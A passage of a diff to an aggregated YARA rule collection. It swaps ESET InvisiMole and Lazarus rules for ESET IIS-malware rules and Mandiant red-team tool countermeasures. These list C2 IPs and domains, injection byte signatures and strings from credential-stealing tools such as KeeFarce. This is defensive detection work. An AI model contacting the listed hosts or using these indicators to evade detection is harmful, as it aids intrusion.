ESET_IIS_Native_Module_PRIVATE and 5 of them } import "pe" -rule ESET_Apt_Windows_Invisimole_C2 : FILE +rule ESET_IIS_Group13_Iiserpent { meta: - description = "InvisiMole C&C servers" + description = "Detects Group 13 native IIS malware family (IISerpent)" author = "ESET Research" - id = "9279c8cd-2c16-5f90-a7f5-e668d57c805b" - date = "2021-05-17" - modified = "2021-05-17" + id = "f22dffb1-466f-5a7b-b9aa-de7ba991db1a" + date = "2021-08-04" + modified = "2021-08-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/invisimole/invisimole.yar#L257-L297" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "aff8456ce7a9ebe875c02e51c09b77ee7b1fddfc11d4ad236e12c8c5240a01a8" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L497-L523" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "7077b842c53ee1581ad4150cdfaac3502bfc0fbd3b823190ad648e09f36e442d" score = 75 - quality = 78 - tags = "FILE" + quality = 80 + tags = "" license = "BSD 2-Clause" version = "1" strings: - $s1 = "46.165.220.228" ascii wide - $s2 = "80.255.3.66" ascii wide - $s3 = "85.17.26.174" ascii wide - $s4 = "185.193.38.55" ascii wide - $s5 = "194.187.249.157" ascii wide - $s6 = "195.154.255.211" ascii wide - $s7 = "153.re" ascii wide fullword - $s8 = "adstat.red" ascii wide - $s9 = "adtrax.net" ascii wide - $s10 = "akamai.sytes.net" ascii wide - $s11 = "amz-eu401.com" ascii wide - $s12 = "blabla234342.sytes.net" ascii wide - $s13 = "mx1.be" ascii wide fullword - $s14 = "statad.de" ascii wide - $s15 = "time.servehttp.com" ascii wide - $s16 = "upd.re" ascii wide fullword - $s17 = "update.xn--6frz82g" ascii wide - $s18 = "updatecloud.sytes.net" ascii wide - $s19 = "updchecking.sytes.net" ascii wide - $s20 = "wlsts.net" ascii wide - $s21 = "ro2.host" ascii wide fullword - $s22 = "2ld.xyz" ascii wide fullword - $s23 = "the-haba.com" ascii wide - $s24 = "82.202.172.134" ascii wide - $s25 = "update.xn--6frz82g" ascii wide + $s1 = "/mconfig/lunlian.txt" + $s2 = "http://sb.qrfy.ne" + $s3 = "folderlinkpath" + $s4 = "folderlinkcount" + $s5 = "onlymobilespider" + $s6 = "redirectreferer" + $s7 = "loadSuccessfull : " + $s8 = "spider" + $s9 = "<a href=" + $s11 = "?ReloadModuleConfig=1" + $s12 = "?DisplayModuleConfig=1" condition: - (( uint16(0)==0x5A4D) or ESET_Invisimole_Blob_PRIVATE) and $s21 and any of them + ESET_IIS_Native_Module_PRIVATE and 5 of them } import "pe" -rule ESET_Richheaders_Lazarus_Nukesped_Iconicpayloads_3CX_Q12023 +rule ESET_IIS_Group14 { meta: - description = "Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12" + description = "Detects Group 14 native IIS malware family" author = "ESET Research" - id = "5c815d14-8a3e-5c6a-9dc3-988e0f31c094" - date = "2023-03-31" - modified = "2023-04-19" - reference = "https://github.com/eset/malware-ioc" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/nukesped_lazarus/rich_headers_IconicPayloads_3CX.yar#L6-L23" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - hash = "3b88cda62cdd918b62ef5aa8c5a73a46f176d18b" - hash = "cad1120d91b812acafef7175f949dd1b09c6c21a" - hash = "5b03294b72c0caa5fb20e7817002c600645eb475" - hash = "7491bd61ed15298ce5ee5ffd01c8c82a2cdb40ec" - logic_hash = "f11a1db798bfcc534982bdf6afaae154b095b6a1e0896e75e2791c01e51a1c16" + id = "c773b09e-9f24-5e75-ba80-4be69af70b06" + date = "2021-08-04" + modified = "2021-08-04" + reference = "https://github.com/eset/malware-ioc/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/badiis/badiis.yar#L525-L552" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "ef10a4dfb1a9164533677416a7c9ada715ce10bfc1e5f92b56cf54bd890d4575" score = 75 quality = 80 tags = "" + license = "BSD 2-Clause" + version = "1" + + strings: + $i1 = "agent-self: %s" + $i2 = "/utf.php?key=" + $i3 = "/self.php?v=" + $i4 = "<script type=\"text/javascript\" src=\"//speed.wlaspsd.co" + $i5 = "now.asmkpo.co" + $s1 = "Baiduspider" + $s2 = "360Spider" + $s3 = "Sogou" + $s4 = "YisouSpider" + $s6 = "HTTP_X_FORWARDED_FOR" condition: - pe.rich_signature.toolid(259,30818)==9 and pe.rich_signature.toolid(256,31329)==1 and pe.rich_signature.toolid(261,30818)>=30 and pe.rich_signature.toolid(261,30818)<=38 and pe.rich_signature.toolid(261,29395)>=134 and pe.rich_signature.toolid(261,29395)<=164 and pe.rich_signature.toolid(257,29395)>=6 and pe.rich_signature.toolid(257,29395)<=14 + ESET_IIS_Native_Module_PRIVATE and 2 of ($i*) or 5 of them } /* * YARA Rule Set * Repository Name: FireEye-RT * Repository: https://github.com/mandiant/red_team_tool_countermeasures/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 3561b71724dbfa3e2bb78106aaa2d7f8b892c43b * Number of Rules: 168 * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance) @@ -122125,2524 +123993,2983 @@ CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -rule FIREEYE_RT_Hacktool_MSIL_Puppyhound_1 : FILE + */ +rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_2 : FILE +{ + meta: + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SeatBelt project." + author = "FireEye" + id = "225b42fe-c73a-59c0-a1f4-1d6dff6e76e1" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_2.yar#L4-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "9f401176a9dd18fa2b5b90b4a2aa1356" + logic_hash = "e48474c5025fd88e3c2824e1e943ff56cde0ea05984aad0249ccf73caa6d4a36" + score = 75 + quality = 73 + tags = "FILE" + rev = 3 + + strings: + $typelibguid1 = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 +} +rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_1 : FILE +{ + meta: + description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project." + author = "FireEye" + id = "46477f87-2458-5b8e-894a-9aa536a441ad" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_1.yar#L4-L25" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "848837b83865f3854801be1f25cb9f4d" + logic_hash = "4248e5561ef60e725c23efc89c899d6fc8be5bf2142f700fb70daecd72c30dd8" + score = 75 + quality = 30 + tags = "FILE" + rev = 3 + + strings: + $msil = "_CorExeMain" ascii wide + $str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide + $str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide + $str3 = "LogonId=\"(\\d+)\"" ascii nocase wide + $str4 = "{0}.{1}.{2}.{3}" ascii nocase wide + $str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide + $str6 = "*[System/EventID={0}]" ascii nocase wide + $str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide + $str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide + $str9 = "{0}" ascii nocase wide + $str10 = "{0,-23}" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $msil and all of ($str*) +} +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSACK_1 : FILE +{ + meta: + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsack' project." + author = "FireEye" + id = "8e344acb-73c4-5509-be9d-85cf6fe94445" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSACK/production/yara/APT_HackTool_MSIL_SHARPSACK_1.yar#L4-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "ecc3250e65e34595b4b827add3eb3062edad6a3373930048bfd6225d4a229e93" + score = 75 + quality = 73 + tags = "FILE" + rev = 2 + + strings: + $typelibguid0 = "1946808a-1a01-40c5-947b-8b4c3377f742" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them +} +rule FIREEYE_RT_Hacktool_MSIL_INVEIGHZERO_1 : FILE +{ + meta: + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'inveighzero' project." + author = "FireEye" + id = "f46fe365-ea50-5597-828e-61a7225e4c6e" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/INVEIGHZERO/production/yara/HackTool_MSIL_INVEIGHZERO_1.yar#L4-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "5d10557a83dae9508469fe87f4c0c91beec4d2812856eee461a82d5dbb89aa35" + score = 75 + quality = 73 + tags = "FILE" + rev = 2 + + strings: + $typelibguid0 = "113ae281-d1e5-42e7-9cc2-12d30757baf1" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them +} +import "pe" + +rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_3 : FILE +{ + meta: + description = "No description has been set in the source file - FireEye-RT" + author = "FireEye" + id = "42e4e777-6d51-5733-97df-dc27f13a27b7" + date = "2020-12-18" + modified = "2020-12-18" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_3.yar#L5-L16" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + logic_hash = "41cc6a4c7765b1e5e88d12660b69e434c83938ca974b9ccf6545b4dd5dd78378" + score = 75 + quality = 75 + tags = "FILE" + + strings: + $create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A } + $iz1 = /_Cor(Exe|Dll)Main/ fullword + $rc4 = { 20 00 01 00 00 8D [2] 00 01 1? ?? 20 00 01 00 00 8D [2] 00 01 1? ?? 03 8E 69 8D [2] 00 01 1? ?? 16 0B 2B ?? 1? ?? 07 02 07 02 8E 69 5D 91 9E 1? ?? 07 07 9E 07 17 58 0B 07 20 00 01 00 00 32 } + $suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 } + + condition: + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them +} +import "pe" + +rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_1 : FILE +{ + meta: + description = "No description has been set in the source file - FireEye-RT" + author = "FireEye" + id = "d438575f-3cb2-5cff-b5d4-733044f62e61" + date = "2020-12-18" + modified = "2020-12-18" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_1.yar#L5-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + logic_hash = "56237d686b954950849adeedc87d5f9fbff2335a0ff033ba8571b3e3b93f587c" + score = 75 + quality = 75 + tags = "FILE" + + strings: + $create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A } + $iz1 = /_Cor(Exe|Dll)Main/ fullword + $suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 } + + condition: + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them +} +rule FIREEYE_RT_Hacktool_MSIL_HOLSTER_1 : FILE +{ + meta: + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the a customized version of the 'DUEDLLIGENCE' project." + author = "FireEye" + id = "e1e8979e-2dee-5061-a11d-00dcfba476c3" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/HackTool_MSIL_HOLSTER_1.yar#L4-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "a91bf61cc18705be2288a0f6f125068f" + logic_hash = "bc254a1ab71f2a6092f139ce5a85347a7a4976f963603ffbbebb9b0d6ce6573c" + score = 75 + quality = 73 + tags = "FILE" + rev = 2 + + strings: + $typelibguid1 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them +} +rule FIREEYE_RT_MSIL_Launcher_DUEDLLIGENCE_1 : FILE +{ + meta: + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'DUEDLLIGENCE' project." + author = "FireEye" + id = "86f0ebe5-110b-53e2-bba5-676f00c2cddd" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/MSIL_Launcher_DUEDLLIGENCE_1.yar#L4-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "a91bf61cc18705be2288a0f6f125068f" + logic_hash = "bd6abaa909f0c776d81ed1115e875888336661c91df3881f4f3ea5dd27e115f8" + score = 75 + quality = 73 + tags = "FILE" + rev = 1 + + strings: + $typelibguid0 = "73948912-cebd-48ed-85e2-85fcd1d4f560" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them +} +import "pe" + +rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_2 : FILE +{ + meta: + description = "No description has been set in the source file - FireEye-RT" + author = "FireEye" + id = "b10b476a-0d38-53e4-80cf-559618729268" + date = "2020-12-18" + modified = "2020-12-18" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_2.yar#L5-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + logic_hash = "5a2e0559e3b47c1957a42929fbbeba7a53c21619125381b01dcd8453b6ec4802" + score = 75 + quality = 75 + tags = "FILE" + + strings: + $1 = "DueDLLigence" fullword + $2 = "CPlApplet" fullword + $iz1 = /_Cor(Exe|Dll)Main/ fullword + + condition: + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them +} +rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_2 : FILE +{ + meta: + description = "No description has been set in the source file - FireEye-RT" + author = "FireEye" + id = "49d7891e-b97a-52a8-acfd-bbf986732d6c" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_2.yar#L4-L23" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "98ecf58d48a3eae43899b45cec0fc6b7" + logic_hash = "57387352f8fd08e8b859dffc1164d46370f248b337526c265634160010572a00" + score = 75 + quality = 75 + tags = "FILE" + rev = 1 + + strings: + $a1 = "SharPersist.lib" + $a2 = "SharPersist.exe" + $b1 = "ERROR: Invalid hotkey location option given." ascii wide + $b2 = "ERROR: Invalid hotkey given." ascii wide + $b3 = "ERROR: Keepass configuration file not found." ascii wide + $b4 = "ERROR: Keepass configuration file was not found." ascii wide + $b5 = "ERROR: That value already exists in:" ascii wide + $b6 = "ERROR: Failed to delete hidden registry key." ascii wide + $pdb1 = "\\SharPersist\\" + $pdb2 = "\\SharPersist.pdb" + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ((@pdb2[1]<@pdb1[1]+50) or (1 of ($a*) and 2 of ($b*))) +} +rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_1 : FILE +{ + meta: + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPersist project." + author = "FireEye" + id = "586e6c91-6970-57d1-8d8c-05ae9eb6117a" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_1.yar#L4-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "98ecf58d48a3eae43899b45cec0fc6b7" + logic_hash = "cf480026c31b522850e25ba2d7986773d9c664242a2667ecd33151621c98c91e" + score = 75 + quality = 73 + tags = "FILE" + rev = 1 + + strings: + $typelibguid1 = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 +} +rule FIREEYE_RT_Trojan_Macro_RESUMEPLEASE_1 +{ + meta: + description = "No description has been set in the source file - FireEye-RT" + author = "FireEye" + id = "068662f6-28b8-5538-8bc3-6506565305ae" + date = "2020-12-01" + date = "2020-12-01" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RESUMEPLEASE/production/yara/Trojan_Macro_RESUMEPLEASE_1.yar#L4-L21" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "d5d3d23c8573d999f1c48d3e211b1066" + logic_hash = "040457bc446e496431129ff4623ddda5d9c2ce339ba65a7fbe42114626f36c60" + score = 75 + quality = 75 + tags = "" + rev = 1 + + strings: + $str00 = "For Binary As" + $str01 = "Range.Text" + $str02 = "Environ(" + $str03 = "CByte(" + $str04 = ".SpawnInstance_" + $str05 = ".Create(" + + condition: + all of them +} +rule FIREEYE_RT_Builder_MSIL_Sharpgenerator_1 : FILE +{ + meta: + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGenerator' project." + author = "FireEye" + id = "ab661cba-f695-59d2-9071-9b9a90233457" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPGENERATOR/production/yara/Builder_MSIL_SharpGenerator_1.yar#L4-L15" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "6dc0780e54d33df733aadc8a89077232baa63bf1cbe47c5d164c57ce3185dd71" + score = 75 + quality = 73 + tags = "FILE" + rev = 1 + + strings: + $typelibguid0 = "3f450977-d796-4016-bb78-c9e91c6a0f08" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them +} +rule FIREEYE_RT_APT_Hacktool_MSIL_REVOLVER_1 : FILE +{ + meta: + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'revolver' project." + author = "FireEye" + id = "8fa5adb7-dc66-51bc-9f60-2308515f33a8" + date = "2020-12-09" + modified = "2020-12-09" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_HackTool_MSIL_REVOLVER_1.yar#L4-L16" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "8df8a56ed55b7857adb95daa643d544a49eb5f1952b4ad3ef757c34dad2ce317" + score = 75 + quality = 71 + tags = "FILE" + rev = 2 + + strings: + $typelibguid0 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide + $typelibguid1 = "b214d962-7595-440b-abef-f83ecdb999d2" ascii nocase wide + + condition: + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them +} +import "pe" + +rule FIREEYE_RT_FE_APT_Loader_MSIL_REVOLVER_1 : FILE +{ + meta: + description = "No description has been set in the source file - FireEye-RT" + author = "FireEye" + id = "d99620e0-39ed-58db-acce-0d885a9e0bf7" + date = "2020-12-18" + modified = "2020-12-18" + reference = "https://github.com/mandiant/red_team_tool_countermeasures/" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_Loader_MSIL_REVOLVER_1.yar#L5-L14" + license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" + logic_hash = "1231f4c961dec122ebcb142052c2c7c03acf9b556cdb71a3efabde6bcf50a939" + score = 75 + quality = 75 + tags = "FILE" + + strings: + $inject = { 28 [2] 00 06 0? 0? 7B [2] 00 04 7E [2] 00 0A 28 [2] 00 0A [2-40] 7E [2] 00 0A 0? 20 00 10 00 00 28 [2] 00 0A 0? 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? ?? 20 00 30 00 00 1F 40 28 [2] 00 06 [2-40] 28 [2] 00 0A 1? 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 1? ?? FE 15 [2] 00 02 1? ?? 72 [2] 00 70 28 [2] 00 06 1? ?? FE 15 [2] 00 02 1? ?? 1? ?? 1? 28 [2] 00 06 2? 7E [2] 00 0A 1? ?? 0? 7B [2] 00 04 1? ?? 1? 1? ?? 28 [2] 00 06 2? ?? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-10] 7E [2] 00 0A 1? ?? 1? ?? 20 [2] 1F 00 7E [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? 1? 20 [2] 00 00 20 [2] 00 00 7E [2] 00 0A 28 [2] 00 06 2? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-40] 1? ?? 0? 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 2? ?? 2? 1? 1? ?? 1? ?? 1? ?? 28 [2] 00 06 } + $iz1 = /_Cor(Exe|Dll)Main/ fullword + + condition: + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them +} +rule FIREEYE_RT_Hacktool_MSIL_Keefarce_1 : FILE { meta: - description = "This is a modification of an existing FireEye detection for SharpHound. However, it looks for the string 'PuppyHound' instead of 'SharpHound' as this is all that was needed to detect the PuppyHound variant of SharpHound." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeeFarce' project." author = "FireEye" - id = "1155f959-c8bc-597a-8a80-abee8d95b6ec" + id = "c17add0c-e09f-5ced-a4e1-bf60afad4725" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_PuppyHound_1.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEFARCE/production/yara/HackTool_MSIL_KeeFarce_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "eeedc09570324767a3de8205f66a5295" - logic_hash = "39073bbfef15ecd28c1772e5d01e54c3d5774ecb4c90f0076bda5dc400abacba" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "8db86230849137608880dbe448737fc70068d308772e294cc69301b18ae10908" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 6 + rev = 3 strings: - $1 = "PuppyHound" - $2 = "UserDomainKey" - $3 